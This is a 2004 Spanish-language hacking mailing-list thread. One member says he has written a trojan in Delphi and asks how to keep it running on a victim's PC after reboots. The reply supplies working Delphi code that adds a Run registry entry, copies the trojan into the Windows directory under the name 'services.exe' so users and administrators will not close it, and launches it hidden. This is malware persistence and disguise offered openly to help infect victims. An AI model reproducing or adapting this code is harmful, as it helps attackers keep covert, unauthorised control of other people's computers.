[HACK] Troyanos en Delphi

Yoany Vaillant Fajardo yoany at ispcmw.rimed.cu
Thu Jun 17 00:34:39 CEST 2004 

Hola;

	solo tienes que aseguararte que se ejecute cada ves que inicie la
maquina, esto lo puedes lograr escribiendo en el registro y así aseguras la
existencia del mismo, mejor quedaria si le cambias el nombre al ejecutable
de tu troyano por el nombre de services.exe con este con este nombre en el
ejecutable ningun usuario y ni el adminstrador de maquina podrá cerrarlo.

Ejemplo:
	:

function GetWindowsDirectory : String;
  var
     pcWindowsDirectory : PChar;
     dwWDSize           : DWORD;
  begin
     dwWDSize := MAX_PATH + 1;
     GetMem( pcWindowsDirectory, dwWDSize );
     try
        if Windows.GetWindowsDirectory( pcWindowsDirectory, dwWDSize ) <> 0
then
           Result := pcWindowsDirectory;
     finally
        FreeMem( pcWindowsDirectory );
     end;
  end;

procedure TForm1.Autorun;
var
   Registro    :TRegistry;
begin
  Registro:=TRegistry.create;
  Registro.RootKey := HKEY_LOCAL_MACHINE;

  if Registro.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run',FALSE)
then
    begin

      Registro.WriteString('SystemRoot',GetWindowsDirectory+
'\services.exe');

      if CopyFile(PChar('services.exe'),PChar(GetWindowsDirectory+
'\services.exe'),FALSE) then
        ShellExecute(Handle, 'open',PChar(GetWindowsDirectory+
'\services.exe'),nil,nil, 0);

    end;

 Registro.Destroy;
end;

	Bueno chama si tienes más dudas acerca del tema me puedes escribir a
mi correo: copxer2000 at yahoo.com espero que este ejemplito que haya servido
de algo.
Saludos,
[ScW]Copxer


-----Mensaje original-----
De: hacking-bounces at argo.es [mailto:hacking-bounces at argo.es] En nombre de
villalobo at cubatel.cu
Enviado el: Tuesday, June 15, 2004 9:57 AM
Para: hacking at argo.es
Asunto: [HACK] Troyanos en Delphi

Hola listesros...
He echo un trojan en Delphi7 con sus respectivas funciones
Server:
me pregunto como puedo hacer que cuado se ejecute el server se reejecute
cadaves que se reeinicie la PC?? pues sino voy a tener que infectar a la
victima cadabes que reinicie la PC..
Saludos DIABLO...



_______________________________________________
Lista - http://mailman.argo.es/listinfo/hacking
FAQ - http://www.argo.es/~jcea/artic/hack-faq.htm
"una-al-dia" para estar siempre informado - http://www.hispasec.com/

............................................................
Este mensaje ha sido analizado por MDaemon Antivirus v2.21.
Instituto Superior Pedagógico de Camaguey, Cuba.

More information about the hacking mailing list